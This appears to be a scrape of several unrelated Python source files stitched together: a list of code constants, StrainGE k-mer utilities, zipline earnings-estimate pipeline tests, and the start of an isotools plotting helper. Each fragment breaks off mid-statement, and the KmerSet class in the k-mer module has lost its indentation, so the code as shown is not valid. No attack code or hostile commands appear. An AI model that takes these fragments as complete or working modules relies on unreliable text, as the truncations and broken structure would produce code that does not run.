X85_Y09 = "X85-Y09"
X85 = "X85"
X86 = "X86"
X87 = "X87"
X88 = "X88"
X89 = "X89"
X90 = "X90"
X91 = "X91"
X92 = "X92"
X93 = "X93"
X94 = "X94"
X95 = "X95"
X96 = "X96"
X97 = "X97"
X98 = "X98"
X99 = "X99"
Y00 = "Y00"
Y01 = "Y01"
Y02 = "Y02"
Y03 = "Y03"
Y04 = "Y04"
Y05 = "Y05"
Y06 = "Y06"
Y06_0 = "Y06.0"
Y06_1 | |
<filename>src/strainge/kmertools.py
# Copyright (c) 2016-2019, Broad Institute, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name Broad Institute, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import os
import logging
import h5py
import pysam
import skbio
import numpy as np
import matplotlib.pyplot as plt
from strainge import kmerizer
from strainge.io.utils import open_compressed, read_fastq
logger = logging.getLogger(__name__)

# Default k-mer length and fingerprint sampling fractions.
DEFAULT_K = 23
DEFAULT_FINGERPRINT_FRACTION = 0.01
# Fraction assumed for older HDF5 files lacking a fingerprint_fraction attr.
OLD_FINGERPRINT_FRACTION = 0.002

# 2-bit encodings of the four nucleotides; BASES maps code -> letter.
A = 0
C = 1
G = 2
T = 3
BASES = "ACGT"
def kmer_string(k, kmer):
    """Decode a 2-bit-packed k-mer integer into its ACGT string.

    Parameters
    ----------
    k : int
        K-mer length (number of bases packed into `kmer`).
    kmer : int
        Packed k-mer; the most significant 2 bits encode the first base.

    Returns
    -------
    str
        The k-character nucleotide string.
    """
    # FIX: use a distinct loop variable; the original comprehension reused
    # (shadowed) the parameter name `k`, which worked only by accident of
    # comprehension scoping and was confusing to read.
    return ''.join(BASES[(kmer >> (2 * i)) & 3] for i in range(k - 1, -1, -1))
def iter_sequences_bam(bamfile):
    """Iterate over sequences in a BAM file. Only outputs the sequence
    (as UTF-8 bytes), useful for kmerizing. QC-failed reads are skipped.
    """
    bam = pysam.AlignmentFile(bamfile, check_header=False, check_sq=False)
    try:
        seq_iter = iter(bam.fetch(until_eof=True))
        seq_iter = filter(lambda r: not r.is_qcfail, seq_iter)
        yield from (seq.seq.encode('utf-8') for seq in seq_iter)
    finally:
        # FIX: close the file even when the consumer abandons the generator
        # early; the original only closed after full exhaustion.
        bam.close()
def iter_sequences_fasta(f):
    """Yield each FASTA record in `f` as a plain string (via scikit-bio)."""
    for record in skbio.io.read(f, "fasta"):
        yield str(record)
def iter_sequences_fastq(f):
    """Yield the sequence line of every FASTQ record in `f`."""
    for record in read_fastq(f):
        yield record[1]
def open_seq_file(file_name):
    """
    Iterate over sequences present in either a BAM file, FASTA file, or FASTQ
    file.

    Assumes fasta unless ".fastq" or ".fq" in the file name.

    Parameters
    ----------
    file_name : str
        The file to open

    Yields
    ------
    str
        Each sequence present in the given file
    """
    parts = file_name.split('.')
    if "bam" in parts:
        yield from iter_sequences_bam(file_name)
        return
    with open_compressed(file_name) as handle:
        if "fastq" in parts or "fq" in parts:
            reader = iter_sequences_fastq
        else:
            reader = iter_sequences_fasta
        yield from reader(handle)
def load_hdf5(file_path, thing, expect_k=None):
    """Load dataset `thing` from a KmerSet HDF5 file as a numpy array.

    Raises ValueError if the file is not a KmerSet, or if its k-mer size
    differs from `expect_k` (when given).
    """
    with h5py.File(file_path, 'r') as h5:
        file_type = h5.attrs['type']
        if isinstance(file_type, bytes):
            file_type = file_type.decode()

        if file_type != "KmerSet":
            raise ValueError("The HDF5 file is not a KmerSet, unexpected type:"
                             " '{}'".format(h5.attrs['type']))

        k = h5.attrs['k']
        if expect_k is not None and expect_k != k:
            raise ValueError(f"The loaded kmerset has not the expected k-mer size! Expected: {expect_k}, actual: {k}")

        return np.array(h5[thing])
def load_kmers(file_name, expect_k=None):
    """Load the 'kmers' array from a KmerSet HDF5 file."""
    return load_hdf5(file_name, "kmers", expect_k)


def load_counts(file_name, expect_k=None):
    """Load the 'counts' array from a KmerSet HDF5 file."""
    return load_hdf5(file_name, "counts", expect_k)


def load_fingerprint(file_name, expect_k=None):
    """Load the 'fingerprint' array from a KmerSet HDF5 file."""
    return load_hdf5(file_name, "fingerprint", expect_k)
def name_from_path(file_path):
    """Return the file's base name without its final extension."""
    base_name = os.path.basename(file_path)
    stem, _extension = os.path.splitext(base_name)
    return stem
def kmerset_from_hdf5(file_path):
    """Deserialize a KmerSet from an HDF5 file (".hdf5" appended if missing)."""
    if not file_path.endswith(".hdf5"):
        file_path += ".hdf5"

    with h5py.File(file_path, 'r') as h5:
        file_type = h5.attrs['type']
        if isinstance(file_type, bytes):
            file_type = file_type.decode()
        assert file_type == "KmerSet", "Not a KmerSet file!"

        kset = KmerSet(h5.attrs['k'])
        if "fingerprint_fraction" in h5.attrs:
            kset.fingerprint_fraction = h5.attrs["fingerprint_fraction"]

        if "fingerprint" in h5:
            kset.fingerprint = np.array(h5["fingerprint"])
            # Older files carry a fingerprint without a fraction attribute.
            if not kset.fingerprint_fraction:
                kset.fingerprint_fraction = OLD_FINGERPRINT_FRACTION

        for attr_name in ("fingerprint_counts", "kmers", "counts"):
            if attr_name in h5:
                setattr(kset, attr_name, np.array(h5[attr_name]))

    return kset
def kmerset_from_file(file_path, k=DEFAULT_K):
    """Load a KmerSet from an HDF5 file.

    The `k` parameter is ignored (kept for backward compatibility); the
    k-mer size stored in the file is used instead.
    """
    return kmerset_from_hdf5(file_path)
def similarity_score(kmers1, kmers2, scoring="jaccard"):
    """Compute a similarity score between two sorted k-mer arrays.

    Parameters
    ----------
    kmers1, kmers2 : np.ndarray
        K-mer arrays as produced by kmerizer.
    scoring : str
        One of "jaccard", "minsize", "meansize", "maxsize", "reference".

    Returns
    -------
    float

    Raises
    ------
    ValueError
        If `scoring` is not a recognized method. (FIX: the original used an
        `assert` here, which is stripped under `python -O` and would then
        fall through to returning an unbound `score`.)
    """
    # count of kmers in common
    intersection = float(kmerizer.count_common(kmers1, kmers2))

    if scoring == "jaccard":
        # Use Jaccard similarity index
        score = intersection / (kmers1.size + kmers2.size - intersection)
    elif scoring == "minsize":
        # Use intersection / min_size (proper subset scores 1.0)
        score = intersection / min(kmers1.size, kmers2.size)
    elif scoring == "meansize":
        # Use mean size in denominator (used in Mash)
        score = intersection / ((kmers1.size + kmers2.size) / 2)
    elif scoring == "maxsize":
        # Use intersection / max_size (proper subset scores min/max)
        score = intersection / max(kmers1.size, kmers2.size)
    elif scoring == "reference":
        # Use intersection / size of reference (useful for comparing reads to
        # assembled references)
        score = intersection / kmers2.size
    else:
        raise ValueError(f"unknown scoring method: {scoring!r}")
    return score
def similarity_numerator_denominator(kmers1, kmers2, scoring="jaccard"):
    """Return (intersection, denominator) for the given similarity scoring.

    Supports the same scoring methods as `similarity_score`: "jaccard",
    "minsize", "meansize", "maxsize" and "reference". (FIX: the original
    omitted the "meansize" branch even though `similarity_score` accepts
    it, and validated `scoring` with an `assert` that is stripped under
    `python -O`.)
    """
    # count of kmers in common
    intersection = float(kmerizer.count_common(kmers1, kmers2))

    if scoring == "jaccard":
        # Use Jaccard similarity index
        denom = (kmers1.size + kmers2.size - intersection)
    elif scoring == "minsize":
        # Use intersection / min_size (proper subset scores 1.0)
        denom = min(kmers1.size, kmers2.size)
    elif scoring == "meansize":
        # Use mean size in denominator (used in Mash)
        denom = (kmers1.size + kmers2.size) / 2
    elif scoring == "maxsize":
        # Use intersection / max_size (proper subset scores min/max)
        denom = max(kmers1.size, kmers2.size)
    elif scoring == "reference":
        # Use intersection / size of reference (useful for comparing reads to
        # assembled references)
        denom = kmers2.size
    else:
        raise ValueError(f"unknown scoring method: {scoring!r}")
    return intersection, denom
def build_kmer_count_matrix(kmersets):
    """Build a big matrix with kmer counts from a list of kmersets.

    Each column will represent a single k-mer set and each row a k-mer. This
    will effectively merge all kmersets to a single matrix.

    Parameters
    ----------
    kmersets : List[KmerSet]
        List of `KmerSet` objects to build the matrix from.

    Returns
    -------
    Tuple[List[kmer_t], array]
        This function returns a tuple with two elements: the first element is
        a list of k-mers, i.e. the labels for the rows of the matrix, and the
        second element is the matrix itself.
    """
    # Defer to our C++ extension
    return kmerizer.build_kmer_count_matrix([
        (kmerset.kmers, kmerset.counts) for kmerset in kmersets
    ])
class KmerSet(object):
"""
Holds array of kmers and their associated counts & stats.
"""
def __init__(self, k=DEFAULT_K):
    """Create an empty KmerSet for k-mers of length `k`."""
    self.k = k
    # data arrays
    self.kmers = None
    self.counts = None
    self.fingerprint = None
    self.fingerprint_counts = None
    self.fingerprint_fraction = None
    self.singletons = None
    # stats from kmerizing, if appropriate
    self.n_seqs = 0
    self.n_bases = 0
    self.n_kmers = 0
def __eq__(self, other):
    """KmerSets are equal when k, fingerprint, kmers and counts all match."""
    if self.k != other.k:
        return False
    pairs = (
        (self.fingerprint, other.fingerprint),
        (self.kmers, other.kmers),
        (self.counts, other.counts),
    )
    return all(np.array_equal(mine, theirs) for mine, theirs in pairs)
def kmerize_file(self, file_name, batch_size=100000000, verbose=True,
                 limit=0, prune=0):
    """Count k-mers from a sequence file, accumulating in fixed-size batches.

    Parameters
    ----------
    file_name : str
        BAM/FASTA/FASTQ (possibly compressed) file to kmerize.
    batch_size : int
        Number of k-mer slots buffered before merging into the running counts.
    verbose : bool
        Print stats after each merged batch.
    limit : int
        If nonzero, stop once roughly this many k-mers have been seen.
    prune : int
        If nonzero, drop singleton k-mers whenever their number exceeds this
        threshold (bounds memory; the final result is pruned too).
    """
    seq_file = open_seq_file(file_name)
    batch = np.empty(batch_size, dtype=np.uint64)

    n_seqs = 0
    n_bases = 0
    n_kmers = 0
    pruned = False
    for seq in seq_file:
        n_seqs += 1
        seq_length = len(seq)
        n_bases += seq_length
        # Flush the batch if this sequence's k-mers might not fit.
        if n_kmers + seq_length > batch_size:
            self.process_batch(batch, n_seqs, n_bases, n_kmers, verbose)
            if limit and self.n_kmers > limit:
                break
            if prune and self.singletons > prune:
                self.prune_singletons(verbose)
                pruned = True
            n_seqs = 0
            n_bases = 0
            n_kmers = 0
        n_kmers += kmerizer.kmerize_into_array(self.k, seq, batch, n_kmers)
        if limit and self.n_kmers + n_kmers >= limit:
            break
    # Merge whatever remains in the final partial batch.
    self.process_batch(batch, n_seqs, n_bases, n_kmers, verbose)
    if pruned:
        # Keep the result consistent with the earlier pruned batches.
        self.prune_singletons(verbose)
def kmerize_seq(self, seq):
    """Kmerize a single sequence, replacing any existing kmer/count arrays.

    NOTE(review): n_kmers is assigned (not accumulated) here, unlike
    kmerize_file which accumulates across batches — confirm the overwrite
    is intended.
    """
    kmers = kmerizer.kmerize(self.k, seq)
    self.n_seqs += 1
    self.n_bases += len(seq)
    self.n_kmers = kmers.size
    self.kmers, self.counts = np.unique(kmers, return_counts=True)
def process_batch(self, batch, nseqs, nbases, nkmers, verbose):
    """Merge the first `nkmers` entries of `batch` into the running counts.

    Updates cumulative stats (n_seqs/n_bases/n_kmers) and the singleton
    count used by the pruning heuristic.
    """
    self.n_seqs += nseqs
    self.n_bases += nbases
    self.n_kmers += nkmers

    new_kmers, new_counts = np.unique(batch[:nkmers], return_counts=True)

    if self.kmers is None:
        # First batch: the unique result is the whole set.
        self.kmers = new_kmers
        self.counts = new_counts
    else:
        self.kmers, self.counts = kmerizer.merge_counts(
            self.kmers, self.counts, new_kmers, new_counts)

    self.singletons = np.count_nonzero(self.counts == 1)
    if verbose:
        self.print_stats()
def prune_singletons(self, verbose=False):
    """Drop every k-mer whose count is exactly 1 (`verbose` is unused)."""
    multi = self.counts > 1
    self.kmers, self.counts = self.kmers[multi], self.counts[multi]
    logger.debug("Pruned singletons: %d distinct k-mers remain",
                 self.kmers.size)
def merge_kmerset(self, other):
    """Return a new KmerSet combining this set's counts with `other`'s."""
    merged = KmerSet(self.k)
    merged.kmers, merged.counts = kmerizer.merge_counts(
        self.kmers, self.counts, other.kmers, other.counts)
    return merged
def intersect(self, kmers):
    """
    Reduce this set in place to the k-mers also present in `kmers`.

    :param kmers: kmers to keep
    :return: reduced version of self
    """
    keep_ix = kmerizer.intersect_ix(self.kmers, kmers)
    self.kmers, self.counts = self.kmers[keep_ix], self.counts[keep_ix]
    return self
def exclude(self, kmers):
"""
Return this KmerSet with excluded kmers removed.
:param kmers: kmers to exclude
:return: reduced version of self
"""
new_kmers = kmerizer.diff(self.kmers, kmers)
ix = kmerizer.intersect_ix(self.kmers, new_kmers)
self.counts = | |
from datetime import timedelta
from functools import partial
import itertools
from parameterized import parameterized
import numpy as np
from numpy.testing import assert_array_equal, assert_almost_equal
import pandas as pd
from toolz import merge
from zipline.pipeline import SimplePipelineEngine, Pipeline, CustomFactor
from zipline.pipeline.common import (
EVENT_DATE_FIELD_NAME,
FISCAL_QUARTER_FIELD_NAME,
FISCAL_YEAR_FIELD_NAME,
SID_FIELD_NAME,
TS_FIELD_NAME,
)
from zipline.pipeline.data import DataSet
from zipline.pipeline.data import Column
from zipline.pipeline.domain import EquitySessionDomain
from zipline.pipeline.loaders.earnings_estimates import (
NextEarningsEstimatesLoader,
NextSplitAdjustedEarningsEstimatesLoader,
normalize_quarters,
PreviousEarningsEstimatesLoader,
PreviousSplitAdjustedEarningsEstimatesLoader,
split_normalized_quarters,
)
from zipline.testing.fixtures import (
WithAdjustmentReader,
WithTradingSessions,
ZiplineTestCase,
)
from zipline.testing.predicates import assert_equal
from zipline.testing.predicates import assert_frame_equal
from zipline.utils.numpy_utils import datetime64ns_dtype
from zipline.utils.numpy_utils import float64_dtype
import pytest
class Estimates(DataSet):
    """Pipeline DataSet for single-estimate earnings data used in these tests."""

    event_date = Column(dtype=datetime64ns_dtype)
    fiscal_quarter = Column(dtype=float64_dtype)
    fiscal_year = Column(dtype=float64_dtype)
    estimate = Column(dtype=float64_dtype)
class MultipleColumnsEstimates(DataSet):
    """Like Estimates but with two estimate columns, for multi-column tests."""

    event_date = Column(dtype=datetime64ns_dtype)
    fiscal_quarter = Column(dtype=float64_dtype)
    fiscal_year = Column(dtype=float64_dtype)
    estimate1 = Column(dtype=float64_dtype)
    estimate2 = Column(dtype=float64_dtype)
def QuartersEstimates(announcements_out):
    """Build an Estimates subclass pinned to `announcements_out` quarters out.

    NOTE(review): `name = Estimates` binds the class object rather than a
    string — looks suspicious but is preserved as-is; confirm against how
    the estimates loaders consume `name`.
    """
    class QtrEstimates(Estimates):
        num_announcements = announcements_out
        name = Estimates

    return QtrEstimates
def MultipleColumnsQuartersEstimates(announcements_out):
    """Multi-column variant of QuartersEstimates.

    NOTE(review): as in QuartersEstimates, `name = Estimates` binds a class
    object, not a string — confirm intended.
    """
    class QtrEstimates(MultipleColumnsEstimates):
        num_announcements = announcements_out
        name = Estimates

    return QtrEstimates
def QuartersEstimatesNoNumQuartersAttr(num_qtr):
    """Like QuartersEstimates but deliberately omitting `num_announcements`.

    `num_qtr` is unused; the point of this factory is the *absence* of the
    num_announcements attribute on the generated class.
    """
    class QtrEstimates(Estimates):
        name = Estimates

    return QtrEstimates
def create_expected_df_for_factor_compute(start_date, sids, tuples, end_date):
    """
    Given a list of tuples of new data we get for each sid on each critical
    date (when information changes), create a DataFrame that fills that
    data through a date range ending at `end_date`.
    """
    df = pd.DataFrame(tuples, columns=[SID_FIELD_NAME, "estimate", "knowledge_date"])
    # One column per sid, one row per knowledge date. Duplicate
    # (sid, knowledge_date) pairs are averaged (pivot_table's default agg).
    df = df.pivot_table(
        columns=SID_FIELD_NAME, values="estimate", index="knowledge_date", dropna=False
    )
    # Expand to one row per calendar day in [start_date, end_date].
    df = df.reindex(pd.date_range(start_date, end_date))
    # Index name is lost during reindex.
    df.index = df.index.rename("knowledge_date")
    df["at_date"] = end_date.tz_localize("utc")
    # Forward-fill so each date carries the latest known estimate.
    df = df.set_index(["at_date", df.index.tz_localize("utc")]).ffill()
    # Sids that never appear in `tuples` still need (all-NaN) columns.
    new_sids = set(sids) - set(df.columns)
    df = df.reindex(columns=df.columns.union(new_sids))
    return df
class WithEstimates(WithTradingSessions, WithAdjustmentReader):
    """
    ZiplineTestCase mixin providing cls.loader and cls.events as class
    level fixtures.

    Methods
    -------
    make_loader(events, columns) -> PipelineLoader
        Method which returns the loader to be used throughout tests.

        events : pd.DataFrame
            The raw events to be used as input to the pipeline loader.
        columns : dict[str -> str]
            The dictionary mapping the names of BoundColumns to the
            associated column name in the events DataFrame.
    make_columns() -> dict[BoundColumn -> str]
        Method which returns a dictionary of BoundColumns mapped to the
        associated column names in the raw data.
    """

    # Short window defined in order for test to run faster.
    START_DATE = pd.Timestamp("2014-12-28", tz="utc")
    END_DATE = pd.Timestamp("2015-02-04", tz="utc")

    @classmethod
    def make_loader(cls, events, columns):
        # Abstract hook: concrete subclasses return the loader under test.
        raise NotImplementedError("make_loader")

    @classmethod
    def make_events(cls):
        # Abstract hook: concrete subclasses build the raw events DataFrame.
        raise NotImplementedError("make_events")

    @classmethod
    def get_sids(cls):
        # Derive the asset-fixture sids from the events themselves so the
        # asset finder always covers every sid that appears in the data.
        return cls.events[SID_FIELD_NAME].unique()

    @classmethod
    def make_columns(cls):
        # Default BoundColumn -> raw-column-name mapping for the Estimates
        # dataset; subclasses using other datasets override this.
        return {
            Estimates.event_date: "event_date",
            Estimates.fiscal_quarter: "fiscal_quarter",
            Estimates.fiscal_year: "fiscal_year",
            Estimates.estimate: "estimate",
        }

    def make_engine(self, loader=None):
        # Build a pipeline engine that serves every column from one loader.
        if loader is None:
            loader = self.loader
        return SimplePipelineEngine(
            lambda x: loader,
            self.asset_finder,
            default_domain=EquitySessionDomain(
                self.trading_days,
                self.ASSET_FINDER_COUNTRY_CODE,
            ),
        )

    @classmethod
    def init_class_fixtures(cls):
        # Events must exist before super().init_class_fixtures() because the
        # asset-finder fixture consumes the sids/symbols derived from them.
        cls.events = cls.make_events()
        cls.ASSET_FINDER_EQUITY_SIDS = cls.get_sids()
        cls.ASSET_FINDER_EQUITY_SYMBOLS = [
            "s" + str(n) for n in cls.ASSET_FINDER_EQUITY_SIDS
        ]
        # We need to instantiate certain constants needed by supers of
        # `WithEstimates` before we call their `init_class_fixtures`.
        super(WithEstimates, cls).init_class_fixtures()
        cls.columns = cls.make_columns()
        # Some tests require `WithAdjustmentReader` to be set up by the time we
        # make the loader.
        cls.loader = cls.make_loader(
            cls.events, {column.name: val for column, val in cls.columns.items()}
        )
class WithOneDayPipeline(WithEstimates):
    """
    ZiplineTestCase mixin providing cls.events as a class level fixture and
    defining a test for all inheritors to use.

    Attributes
    ----------
    events : pd.DataFrame
        A simple DataFrame with two estimate columns, a single sid, and no
        other data.

    Tests
    ------
    test_load_one_day()
        Tests that running a pipeline over a single session returns the
        value expected by `make_expected_out` for every dataset column.
    """

    @classmethod
    def make_columns(cls):
        # Map the two-estimate dataset's BoundColumns to raw column names.
        return {
            MultipleColumnsEstimates.event_date: "event_date",
            MultipleColumnsEstimates.fiscal_quarter: "fiscal_quarter",
            MultipleColumnsEstimates.fiscal_year: "fiscal_year",
            MultipleColumnsEstimates.estimate1: "estimate1",
            MultipleColumnsEstimates.estimate2: "estimate2",
        }

    @classmethod
    def make_events(cls):
        # Two announcements for sid 0: Q1 2015 (known from 01-01, event on
        # 01-10) and Q2 2015 (known from 01-06, event on 01-20).
        return pd.DataFrame(
            {
                SID_FIELD_NAME: [0] * 2,
                TS_FIELD_NAME: [pd.Timestamp("2015-01-01"), pd.Timestamp("2015-01-06")],
                EVENT_DATE_FIELD_NAME: [
                    pd.Timestamp("2015-01-10"),
                    pd.Timestamp("2015-01-20"),
                ],
                "estimate1": [1.0, 2.0],
                "estimate2": [3.0, 4.0],
                FISCAL_QUARTER_FIELD_NAME: [1, 2],
                FISCAL_YEAR_FIELD_NAME: [2015, 2015],
            }
        )

    @classmethod
    def make_expected_out(cls):
        # Abstract hook: subclasses define the frame `test_load_one_day`
        # compares against.
        raise NotImplementedError("make_expected_out")

    @classmethod
    def init_class_fixtures(cls):
        super(WithOneDayPipeline, cls).init_class_fixtures()
        cls.sid0 = cls.asset_finder.retrieve_asset(0)
        cls.expected_out = cls.make_expected_out()

    def test_load_one_day(self):
        # We want to test multiple columns
        dataset = MultipleColumnsQuartersEstimates(1)
        engine = self.make_engine()
        results = engine.run_pipeline(
            Pipeline({c.name: c.latest for c in dataset.columns}),
            start_date=pd.Timestamp("2015-01-15", tz="utc"),
            end_date=pd.Timestamp("2015-01-15", tz="utc"),
        )
        # FIX: `DataFrame.sort_index` stopped accepting `axis` positionally
        # (deprecated in pandas 1.x, removed in 2.0); pass it by keyword.
        assert_frame_equal(
            results.sort_index(axis=1), self.expected_out.sort_index(axis=1)
        )
class PreviousWithOneDayPipeline(WithOneDayPipeline, ZiplineTestCase):
    """
    Single-day pipeline test exercising the previous-quarter estimates loader.
    """

    @classmethod
    def make_loader(cls, events, columns):
        return PreviousEarningsEstimatesLoader(events, columns)

    @classmethod
    def make_expected_out(cls):
        # As of 2015-01-15 the most recently announced quarter is Q1 2015.
        expected_index = pd.MultiIndex.from_tuples(
            ((pd.Timestamp("2015-01-15", tz="utc"), cls.sid0),)
        )
        expected_values = {
            EVENT_DATE_FIELD_NAME: pd.Timestamp("2015-01-10"),
            "estimate1": 1.0,
            "estimate2": 3.0,
            FISCAL_QUARTER_FIELD_NAME: 1.0,
            FISCAL_YEAR_FIELD_NAME: 2015.0,
        }
        return pd.DataFrame(expected_values, index=expected_index)
class NextWithOneDayPipeline(WithOneDayPipeline, ZiplineTestCase):
    """
    Single-day pipeline test exercising the next-quarter estimates loader.
    """

    @classmethod
    def make_loader(cls, events, columns):
        return NextEarningsEstimatesLoader(events, columns)

    @classmethod
    def make_expected_out(cls):
        # As of 2015-01-15 the next upcoming quarter is Q2 2015.
        expected_index = pd.MultiIndex.from_tuples(
            ((pd.Timestamp("2015-01-15", tz="utc"), cls.sid0),)
        )
        return pd.DataFrame(
            {
                EVENT_DATE_FIELD_NAME: pd.Timestamp("2015-01-20"),
                "estimate1": 2.0,
                "estimate2": 4.0,
                FISCAL_QUARTER_FIELD_NAME: 2.0,
                FISCAL_YEAR_FIELD_NAME: 2015.0,
            },
            index=expected_index,
        )
# Placeholder event frame: a single row for sid 0 whose remaining columns are
# all NaN.  Used by tests that need syntactically valid events but never read
# their values.
dummy_df = pd.DataFrame(
    {SID_FIELD_NAME: 0},
    columns=[
        SID_FIELD_NAME,
        TS_FIELD_NAME,
        EVENT_DATE_FIELD_NAME,
        FISCAL_QUARTER_FIELD_NAME,
        FISCAL_YEAR_FIELD_NAME,
        "estimate",
    ],
    index=[0],
)
class WithWrongLoaderDefinition(WithEstimates):
    """
    Mixin checking that loaders reject malformed quarter specifications.

    Attributes
    ----------
    events : pd.DataFrame
        The minimal single-sid placeholder frame; these tests never need
        real event data.

    Tests
    ------
    test_wrong_num_announcements_passed()
        Loading with a negative quarter count must raise a ValueError.
    test_no_num_announcements_attr()
        Loading a dataset lacking `num_announcements` must raise an
        AttributeError.
    """

    @classmethod
    def make_events(cls):
        return dummy_df

    def test_wrong_num_announcements_passed(self):
        # Mix two invalid (negative) quarter counts with one valid dataset.
        datasets = (
            QuartersEstimates(-1),
            QuartersEstimates(-2),
            QuartersEstimates(1),
        )
        engine = self.make_engine()
        pipeline_columns = {}
        for ds in datasets:
            for col in ds.columns:
                pipeline_columns[col.name + str(ds.num_announcements)] = col.latest
        p = Pipeline(pipeline_columns)
        err_msg = (
            r"Passed invalid number of quarters -[0-9],-[0-9]; "
            r"must pass a number of quarters >= 0"
        )
        with pytest.raises(ValueError, match=err_msg):
            engine.run_pipeline(
                p,
                start_date=self.trading_days[0],
                end_date=self.trading_days[-1],
            )

    def test_no_num_announcements_attr(self):
        dataset = QuartersEstimatesNoNumQuartersAttr(1)
        engine = self.make_engine()
        p = Pipeline({col.name: col.latest for col in dataset.columns})
        with pytest.raises(AttributeError):
            engine.run_pipeline(
                p,
                start_date=self.trading_days[0],
                end_date=self.trading_days[-1],
            )
class PreviousWithWrongNumQuarters(WithWrongLoaderDefinition, ZiplineTestCase):
    """
    Run the wrong-quarter-count checks against the previous-quarter loader.
    """

    @classmethod
    def make_loader(cls, events, columns):
        loader = PreviousEarningsEstimatesLoader(events, columns)
        return loader
class NextWithWrongNumQuarters(WithWrongLoaderDefinition, ZiplineTestCase):
    """
    Run the wrong-quarter-count checks against the next-quarter loader.
    """

    @classmethod
    def make_loader(cls, events, columns):
        loader = NextEarningsEstimatesLoader(events, columns)
        return loader
# Keyword-argument names specific to the split-adjusted estimates loaders.
# NOTE(review): not referenced anywhere in the visible code — presumably
# consumed elsewhere in this module; confirm before removing.
options = [
    "split_adjustments_loader",
    "split_adjusted_column_names",
    "split_adjusted_asof",
]
class WrongSplitsLoaderDefinition(WithEstimates, ZiplineTestCase):
    """
    Test class that tests that loaders break correctly when incorrectly
    instantiated.

    Tests
    -----
    test_extra_splits_columns_passed(SplitAdjustedEstimatesLoader)
        A test that checks that the loader correctly breaks when an
        unexpected column is passed in the list of split-adjusted columns.
    """

    @classmethod
    def init_class_fixtures(cls):
        # Deliberately start the super() chain *past* `WithEstimates` (note
        # the first argument is WithEstimates, not this class) so its
        # events/loader setup is skipped — these tests construct the loaders
        # themselves from `dummy_df`.
        super(WithEstimates, cls).init_class_fixtures()

    @parameterized.expand(
        itertools.product(
            (
                NextSplitAdjustedEarningsEstimatesLoader,
                PreviousSplitAdjustedEarningsEstimatesLoader,
            ),
        )
    )
    def test_extra_splits_columns_passed(self, loader):
        # The mapping below does not include "extra_col", so naming it in
        # `split_adjusted_column_names` must raise a ValueError.
        columns = {
            Estimates.event_date: "event_date",
            Estimates.fiscal_quarter: "fiscal_quarter",
            Estimates.fiscal_year: "fiscal_year",
            Estimates.estimate: "estimate",
        }
        with pytest.raises(ValueError):
            loader(
                dummy_df,
                {column.name: val for column, val in columns.items()},
                split_adjustments_loader=self.adjustment_reader,
                split_adjusted_column_names=["estimate", "extra_col"],
                split_adjusted_asof=pd.Timestamp("2015-01-01"),
            )
class WithEstimatesTimeZero(WithEstimates):
"""
ZiplineTestCase mixin providing cls.events as a class level fixture and
defining a test for all inheritors to use.
Attributes
----------
cls.events : pd.DataFrame
Generated dynamically in order to test inter-leavings of estimates and
event dates for multiple quarters to make sure that we select the
right immediate 'next' or 'previous' quarter relative to each date -
i.e., the right 'time zero' on the timeline. We care about selecting
the right 'time zero' because we use that to calculate which quarter's
data needs to be returned for each day.
Methods
-------
get_expected_estimate(q1_knowledge,
q2_knowledge,
comparable_date) -> pd.DataFrame
Retrieves the expected estimate given the latest knowledge about each
quarter and the date on which the estimate is being requested. If
there is no expected estimate, returns an empty DataFrame.
Tests
------
test_estimates()
Tests that we get the right 'time zero' value on each day for each
sid and for each column.
"""
# Shorter date range for performance
END_DATE = pd.Timestamp("2015-01-28", tz="utc")
q1_knowledge_dates = [
pd.Timestamp("2015-01-01"),
pd.Timestamp("2015-01-04"),
pd.Timestamp("2015-01-07"),
pd.Timestamp("2015-01-11"),
]
q2_knowledge_dates = [
pd.Timestamp("2015-01-14"),
pd.Timestamp("2015-01-17"),
pd.Timestamp("2015-01-20"),
pd.Timestamp("2015-01-23"),
]
# We want to model the possibility of an estimate predicting a release date
# that doesn't match the actual release. This could be done by dynamically
# generating more combinations with different release dates, but that
# significantly increases the amount of time it takes to run the tests.
# These hard-coded cases are sufficient to know that we can update our
# beliefs when we get | |
# Repository: carmineceraolo/isotools
import matplotlib.colors as plt_col
import matplotlib.patches as patches
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
import numpy as np
from math import log10
import logging
logger = logging.getLogger('isotools')
def _label_overlap(pos1, pos2, width, height):
if abs(pos1[0] - pos2[0]) < width and abs(pos1[1] - pos2[1]) < height:
return True
return False
# Per-priority junction drawing defaults: index 0 = low-coverage,
# 1 = high-coverage, 2 = junctions of interest.
DEFAULT_JPARAMS = [
    {'color': 'lightgrey', 'lwd': 1, 'draw_label': False},  # low coverage junctions
    {'color': 'green', 'lwd': 1, 'draw_label': True},  # high coverage junctions
    {'color': 'purple', 'lwd': 2, 'draw_label': True},  # junctions of interest
]
DEFAULT_PARAMS = dict(min_cov_th=.001, high_cov_th=.05, text_width=.02, arc_type='both', text_height=1, exon_color='green')


def extend_params(params):
    """Fill a (possibly partial) plot-parameter dict with defaults.

    Accepts None or a dict; junction settings may be given either under the
    'jparams' list or via the per-priority aliases ('low_cov_junctions',
    'high_cov_junctions', 'interest_junctions'), which are consumed here.
    """
    if params is None:
